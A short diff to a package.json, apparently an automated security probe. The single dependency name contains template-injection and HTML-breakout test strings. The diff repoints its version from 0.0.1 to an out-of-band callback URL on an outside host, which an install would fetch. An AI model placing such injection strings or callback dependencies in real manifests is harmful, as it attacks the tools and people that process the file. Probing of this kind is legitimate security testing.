--- a/package.json
+++ b/package.json
@@ -4,6 +4,6 @@
   "description": "test1",
   "license": "UNLICENSED",
   "dependencies":{
-    "scrambled-identifier-AXZQAQWL-test{2*2}{{2*22}\"><input>1": "0.0.1"
+    "scrambled-identifier-AXZQAQWL-test{2*2}{{2*22}\"><input>1": "https://5c7f0d7e2e36483181849124b715.ns.pingb.in/i"
   }
 }
